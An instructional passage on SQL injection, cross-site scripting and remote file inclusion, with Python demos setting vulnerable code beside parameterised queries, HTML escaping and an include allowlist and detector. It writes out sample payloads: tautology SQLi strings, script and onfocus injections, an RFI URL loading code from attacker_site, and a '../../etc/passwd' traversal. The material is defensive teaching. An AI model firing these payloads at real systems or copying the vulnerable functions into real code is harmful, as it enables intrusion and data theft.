SQL Injection (SQLi) is a web attack whereby an adversary is able to execute malicious SQL statements that control a web application's database server.
In the right circumstances, an attacker can use SQL injection to bypass a web application's authentication and authorisation mechanisms and retrieve sensitive contents of an entire database. SQL injection can be used to add, modify, and delete database records, affecting data integrity.
Consider a username and password field on a website. Next, consider the following code, which builds an SQL query from the username:
username = getRequestString("username");
query = "SELECT * FROM Users WHERE Username = " + username;
The code above builds a SELECT statement by appending the variable username to the query string. That variable is taken directly from user input (getRequestString).
If an adversary were to visit the website and enter the following into the username field:
john OR 1=1
Then the SQL statement will look like this:
SELECT * FROM Users WHERE Username = john OR 1=1;
Because OR 1=1 is always true, this SELECT statement will return every row in the Users table.
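The following Python example, added here and not part of the original lecture notes, runs the same injection against an in-memory SQLite table and contrasts it with a parameterised query. The lecture snippet concatenates the username without quoting it; a real SQL string literal is quoted, so this example assumes a quoted literal and uses the matching payload john' OR '1'='1. The Users rows are constructed sample data.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the original page).
SAMPLE_USERS = [("john", "pw1"), ("alice", "pw2"), ("bob", "pw3")]


def build_db():
    """Create an in-memory Users table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_query_vulnerable(username):
    """String concatenation as in the lecture snippet (quoted literal assumed)."""
    return "SELECT * FROM Users WHERE Username = '" + username + "'"


def find_users_vulnerable(conn, username):
    """Run the concatenated query: attacker-controlled text becomes SQL syntax."""
    return conn.execute(build_query_vulnerable(username)).fetchall()


def find_users_safe(conn, username):
    """Parameterised query: the driver passes the value separately from the
    statement text, so quotes and OR clauses in the input remain plain data."""
    return conn.execute(
        "SELECT * FROM Users WHERE Username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "john' OR '1'='1"  # constructed payload for the quoted literal
    print(build_query_vulnerable(payload))
    print("concatenated query returned", len(find_users_vulnerable(db, payload)), "rows")
    print("parameterised query returned", len(find_users_safe(db, payload)), "rows")
```

With the payload, the concatenated query returns all three rows while the parameterised query returns none, because the whole string is compared as a single username value. Parameterised queries (or an ORM that uses them) are the primary fix; input validation on its own does not remove the underlying problem.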
Cross-site Scripting (XSS) is a common attack vector that involves injecting malicious code into an input field on a vulnerable website. Where input is not sanitised and not checked for malicious code, the injected code is executed, which could potentially give adversaries root access to the web server hosting the vulnerable website.
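As an added illustration (not from the original notes) of what "sanitising" means on the output side, the Python functions below reflect a submitted value into an HTML page, once unchanged and once encoded with html.escape. The input string is a constructed sample.

```python
import html


def render_greeting_vulnerable(name):
    """Reflect the input into the page unchanged: any markup in `name`
    is interpreted by the browser as live HTML."""
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name):
    """Encode the input for an HTML text node before reflecting it, so
    < > & " and ' become character references and render as text."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_attribute_safe(value):
    """Attribute context: quote=True is required so a double quote cannot
    close the attribute and start a new one."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


def contains_script_tag(rendered):
    """Minimal check used only to show the difference between the two renderings."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    sample = "<script>evil()</script>"  # constructed sample input
    print(render_greeting_vulnerable(sample))
    print(render_greeting_safe(sample))
    print(render_attribute_safe('" autofocus onfocus="evil()'))
```

The encoded form keeps the user's text visible on the page while removing its ability to act as markup. Encoding has to match the context the value lands in (HTML body, attribute, JavaScript, URL), which is why templating engines that escape by default are preferred over hand-built string concatenation.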
Remote File Inclusion (RFI) is another common attack vector, whereby an adversary can gain access to remote files by exploiting a web application that dynamically includes external files or scripts.
When a web application takes user input and passes it to a file include command (e.g. include($filename . ".php")), it is possible to trick the web application into including remote files containing maliciously crafted code.
A typical RFI attack is performed by setting the value of a request parameter to a URL that refers to a malicious file. Consider the following PHP code:
$filename = $_REQUEST["file"];
include($filename . ".php");
The first line of code assigns $filename the value of the file parameter from the HTTP request. The second line dynamically sets the file to be included using the $filename variable. If the web application does not properly sanitise this value, the code can be exploited. Consider the following URL:
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
Passing this value to the web application causes the remote file to be included and executed by the web server.
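The following Python example, added here and not part of the original notes, shows the defensive counterpart to the PHP snippet: the request parameter is mapped onto a fixed allowlist of page names, the resolved path is checked to stay inside the include directory, and a small classifier flags request values that look like inclusion attempts for log review. The allowlist, the page names and the request values are constructed assumptions for this example.

```python
from pathlib import Path
import re
import tempfile

# Constructed allowlist of includable page names (assumption for this example).
ALLOWED_PAGES = {"home", "about", "contact"}


def classify_include_value(value):
    """Return a short reason if the request value looks like an inclusion
    attack, or None if it is a bare page name. Intended for detection and
    log review; the allowlist in resolve_include is the actual control."""
    if re.match(r"^[a-z][a-z0-9+.\-]*://", value, re.IGNORECASE):
        return "remote URL or stream wrapper"
    if "\x00" in value:
        return "null byte"
    if ".." in value:
        return "directory traversal"
    if "/" in value or "\\" in value:
        return "path separator"
    return None


def resolve_include(base_dir, requested):
    """Map the request parameter to a file under base_dir.

    Raises ValueError for anything outside the allowlist or outside base_dir,
    and FileNotFoundError if the allowlisted page is missing on disk."""
    if requested not in ALLOWED_PAGES:
        raise ValueError("page name not in allowlist: %r" % requested)
    base = Path(base_dir).resolve()
    target = (base / (requested + ".php")).resolve()
    # Defence in depth: even an allowlisted name must resolve inside base_dir.
    if base not in target.parents:
        raise ValueError("resolved path escapes include directory")
    if not target.is_file():
        raise FileNotFoundError(str(target))
    return target


def demo():
    """Exercise resolve_include against a constructed include directory."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "home.php").write_text("<?php echo 'home'; ?>")
        out = {"home": str(resolve_include(base, "home"))}
        samples = [
            ("remote", "http://attacker_site/malicous_page"),  # from the notes
            ("traversal", "../../etc/passwd"),  # constructed sample
        ]
        for label, value in samples:
            try:
                resolve_include(base, value)
                out[label] = "accepted"
            except ValueError:
                out[label] = "rejected"
        return out


if __name__ == "__main__":
    for value in ["home", "http://attacker_site/malicous_page", "../../etc/passwd"]:
        print(repr(value), "->", classify_include_value(value))
    print(demo())
```

The allowlist is what makes the include safe: the request value is only ever used as a key, never as a path fragment. The resolved-path check guards against future edits that loosen the allowlist, and classify_include_value gives operations a cheap signal to alert on when such values show up in access logs.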